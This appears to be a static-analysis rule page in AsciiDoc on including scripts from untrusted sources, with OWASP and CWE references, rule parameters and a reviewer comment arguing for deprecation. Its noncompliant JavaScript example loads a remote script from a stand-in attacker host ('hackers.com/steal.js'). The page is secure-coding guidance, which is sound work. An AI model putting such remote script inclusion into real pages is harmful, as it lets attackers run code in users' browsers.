59 lines
1.4 KiB
Plaintext
59 lines
1.4 KiB
Plaintext
== Why is this an issue?
|
|
|
|
Including content in your site from an untrusted source can expose your users to attackers and even compromise your own site. For that reason, this rule raises an issue for each non-relative URL.
|
|
|
|
|
|
=== Noncompliant code example
|
|
|
|
[source,javascript]
|
|
----
|
|
function include(url) {
|
|
var s = document.createElement("script");
|
|
s.setAttribute("type", "text/javascript");
|
|
s.setAttribute("src", url);
|
|
document.body.appendChild(s);
|
|
}
|
|
include("http://hackers.com/steal.js") // Noncompliant
|
|
----
|
|
|
|
== Resources
|
|
|
|
* OWASP - https://owasp.org/www-project-top-ten/2017/A1_2017-Injection[Top 10 2017 Category A1 - Injection]
|
|
* CWE - https://cwe.mitre.org/data/definitions/829[CWE-829 - Inclusion of Functionality from Untrusted Control Sphere]
|
|
|
|
|
|
ifdef::env-github,rspecator-view[]
|
|
|
|
'''
|
|
== Implementation Specification
|
|
(visible only on this page)
|
|
|
|
=== Message
|
|
|
|
Remove this content from an untrusted source.
|
|
|
|
|
|
=== Parameters
|
|
|
|
.domainsToIgnore
|
|
****
|
|
|
|
Comma-delimited list of domains to ignore. Regexes may be used, E.G. (.*\.)?example\.com,foo\.org
|
|
****
|
|
|
|
|
|
'''
|
|
== Comments And Links
|
|
(visible only on this page)
|
|
|
|
=== deprecates: S1829
|
|
|
|
=== on 10 Jan 2020, 10:14:47 Eric Therond wrote:
|
|
Should be deprecated:
|
|
|
|
* No compliant solution to propose
|
|
* Could be noisy <img src="http://example.com/pic.gif"> or <script src=\http://example.com/jquery.js> is pretty common
|
|
* Could be replaced by a more relevant taint analysis rule in the future
|
|
|
|
endif::env-github,rspecator-view[]
|